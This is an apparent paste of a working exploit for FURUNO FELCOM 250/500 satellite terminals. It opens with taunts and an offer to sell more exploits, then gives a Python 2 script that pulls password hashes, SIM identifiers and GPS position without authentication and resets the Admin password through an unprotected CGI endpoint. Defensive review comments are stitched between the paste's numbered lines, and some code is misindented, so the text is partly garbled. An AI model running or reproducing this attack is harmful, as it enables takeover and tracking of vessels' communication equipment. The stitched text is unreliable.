
[FELCOM 250 / 500 EXPLOIT/LOADER][ONLY VURN]

xB4ckdoorREAL Nov 7th, 2018 121 Never
  1. HEY SKIDZ, IF YOU ARE OWN TO CODE YOURSELF, HERE IS THE VURN. DISCOVERED 05/11/18
  2.  
  3. FURUNO FELCOM 250 and 500 devices allow unauthenticated users to change the password for the Admin, Log and Service accounts, as well as the password for the protected "SMS" panel via /cgi-bin/sm_changepassword.cgi and /cgi-bin/sm_sms_changepasswd.cgi.   
  4.  
  5. MIPS PAYLOAD SKIDZ. Make it in python. ;) or contact me to get all fresh and new discovered exploit.
  6. #DISCORD:
  7.  
  8. HEHE OK NOOB... TAKE THIS FUCKING SHIT. [PASSWORD CHANGER]
  9.  
  10. import xml.etree.ElementTree
  11. import requests
  12. import md5
  13. import sys
  14.  
  15. # Replace with your target
# Base URL that every request in this script is built from. The value in the
# paste is a loopback placeholder. The scheme is plain "http", so anything the
# script sends (including the password digest in changePw) is unencrypted.
the_ip = "http://127.0.0.1:4443"

# Account name used by changePw() and by the verification branch of
# getHashes(). The page's description names Admin, Log and Service as the
# accounts affected by the same weakness.
user = "Admin"
  19.  
  20. # Download credentials from host
def getHashes(to_check):
    """List the account hashes the device serves, or check one of them.

    Requests ``/xml/permission.xml`` under ``the_ip`` with a bare GET: no
    credentials, cookie or session are sent. The rest of the function only
    runs when that request returns 200, so a 200 here means the credential
    file was readable without authentication.

    to_check: falsy to print the entries; otherwise the hex digest that the
        entry for the module-level ``user`` is expected to hold.

    Returns nothing; all results are printed. Calls ``sys.exit(0)`` when the
    download does not return 200, so a failure still exits with status 0.

    Written for Python 2 (``print`` statements).

    Review notes (defensive):
      * The file exposes password hashes to any client that can reach the web
        interface. changePw() produces the compared value with plain MD5 and
        no salt, so the stored values are presumably unsalted MD5 -- confirm
        against the device.
      * Requests for ``/xml/permission.xml`` from hosts that are not known
        management stations are worth alerting on wherever HTTP traffic to
        the terminal is logged or monitored.
      * Keeping the web interface unreachable from untrusted networks removes
        the exposure; check the vendor's advisories for fixed firmware.
    """

    print "[*] Downloading hashes"
    # Download credentials XML file (no authentication material is attached)
    dl_xml = requests.get(the_ip+"/xml/permission.xml")

    if(dl_xml.status_code != 200):
        print "[*] Error downloading credentials file"
        sys.exit(0)

    # Parse downloaded credential file.
    # NOTE(review): the body comes from the remote device and ElementTree is
    # not hardened against maliciously constructed XML.
    parsed = xml.etree.ElementTree.fromstring(dl_xml.text)

    # List users and hashes.
    # Access is purely positional: entries 0-2 are printed as
    # "<child 0>: <child 1>", entry 3 as "SMS Server: <child 0>". A document
    # with fewer entries or children raises IndexError (not handled here).
    if not to_check:
        for i in range(0,4):
            if i==3:
                print "SMS Server: "+parsed[i][0].text
            else:
                print parsed[i][0].text+": "+parsed[i][1].text

    # Check if hash update applied successfully.
    # Only the first three entries are searched; if none of them is named
    # `user`, nothing is printed at all.
    else:
        for i in range(0,3):
            if parsed[i][0].text == user:
                if parsed[i][1].text == to_check:
                    print user+": Password update verified"
                else:
                    print user+": Password update mismatch"
  50.  
  51. # Change user's password
def changePw(new_pass):
    """Request a password change for ``user`` and verify it via getHashes().

    Computes the MD5 hex digest of ``new_pass`` and sends it in the query
    string of a GET to ``/cgi-bin/sm_changepassword.cgi``. The request carries
    no credentials, no session and no proof of the current password.

    new_pass: the new password in clear text; it is also echoed to stdout on
        success.

    Returns nothing. Calls ``sys.exit(0)`` when the response status is not
    200, so a failure still exits with status 0.

    Written for Python 2 (``print`` statements and the ``md5`` module, which
    does not exist in Python 3).

    Review notes (defensive):
      * This is the weakness described at the top of the page: a
        state-changing operation reachable by an unauthenticated GET.
      * The digest travels in the URL over plain http (see ``the_ip``), so it
        can end up in proxy or access logs along the path.
      * Any request for ``/cgi-bin/sm_changepassword.cgi`` (or the
        ``sm_sms_changepasswd.cgi`` endpoint the description also names) that
        does not come from a known administrator deserves investigation, and
        the device's credentials should then be treated as compromised.
      * Restricting network access to the management interface is the
        immediate mitigation; check the vendor's advisories for fixed firmware.
    """

    print "[*] Changing password for "+user

    # Generate new MD5 hash (single unsalted MD5 pass over the password)
    m = md5.new()
    m.update(new_pass)
    gen_md5 = m.hexdigest()

    # Send credential update request.
    # Query layout is "<digest>+<digest>+<account>"; the digest is sent twice,
    # presumably as new password plus confirmation -- not confirmed by the page.
    r = requests.get(the_ip+"/cgi-bin/sm_changepassword.cgi?"+gen_md5+"+"+gen_md5+"+"+user)

    # Check if change was successful.
    # Only the HTTP status is inspected here; the real confirmation is the
    # getHashes() comparison below.
    if(r.status_code == 200):
        print "Password successfully changed: "+user+" - "+new_pass
    else:
        print "Error changing password credentials file"
        sys.exit(0)

    # Check if hash correctly updated (re-downloads permission.xml and
    # compares the stored value for `user` with gen_md5)
    getHashes(gen_md5)
  73.  
  74. # Get device info
def getInfo():
    """Download and print device, SIM and position details.

    Issues two bare GET requests, ``/xml/info.xml`` and
    ``/xml/modem_status.xml``, with no credentials attached, and prints
    selected fields from each by position.

    Returns nothing. Calls ``sys.exit(0)`` if either response is not 200, so
    a failure still exits with status 0.

    Written for Python 2 (``print`` statements).

    Review notes (defensive):
      * Going by the labels the script prints, the two files hold the
        serial number, SIM card ID, IMSI, IMEI and a position fix. If the
        device serves them to unauthenticated clients, that is an
        information-disclosure issue in its own right, separate from the
        password change.
      * Requests for these two paths from unexpected sources are a useful
        early indicator, since the script calls this function before it
        changes anything.
    """
    print "[*] Downloading info\n"
    # Download info XML file
    r_inf = requests.get(the_ip+"/xml/info.xml")
    r_gps = requests.get(the_ip+"/xml/modem_status.xml")

    if(r_inf.status_code != 200 or r_gps.status_code != 200):
        print "[*] Error downloading info file"
        sys.exit(0)

    # Parse downloaded inf file.
    # NOTE(review): both bodies come from the remote device and ElementTree is
    # not hardened against maliciously constructed XML. The second body is
    # encoded to UTF-8 bytes before parsing; the first is passed as returned.
    parsed_inf = xml.etree.ElementTree.fromstring(r_inf.text)
    parsed_gps = xml.etree.ElementTree.fromstring(r_gps.text.encode('utf-8'))

    # All fields below are read by fixed index into the first child of the
    # info document; a different layout raises IndexError (not handled).
    print "Device Info:"
    print "[*] Maunfacturer: "+str(parsed_inf[0][0].text)
    print "[*] Model: "+str(parsed_inf[0][1].text)
    print "[*] Serial Number: "+str(parsed_inf[0][3].text)

    print

    print "SIM Info:"
    print "[*] USIMCardID: "+str(parsed_inf[0][4].text)
    print "[*] IMSI: "+str(parsed_inf[0][5].text)
    print "[*] IMEI: "+str(parsed_inf[0][6].text)

    print

    # Position values are taken from the eighth child of the modem status
    # document. Both of the first two lines are labelled "Lat"; the second is
    # presumably the longitude -- confirm against the device's XML.
    print "GPS Info:"
    print "[*] Lat: "+str(parsed_gps[7][0].text.encode('utf-8'))
    print "[*] Lat: "+str(parsed_gps[7][1].text.encode('utf-8'))
    print "[*] Last Update: "+str(parsed_gps[7][4].text)

    # Indentation of the next statement is kept exactly as it appears in the
    # paste (deeper than the surrounding lines).
        print "\n"
  109.  
def main():
    """Run the script's two steps in order: getInfo(), then changePw().

    Review note (defensive): once this has run against a device, the account
    named in ``user`` accepts a password that is published on this page, so
    an affected terminal's credentials should be reset from a trusted path.
    """
    getInfo()

    # Change 'user' password to default (01234567).
    # "default" is the paste author's wording; the page gives no other
    # evidence that this is a factory value.
    changePw("01234567")
  115.  
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()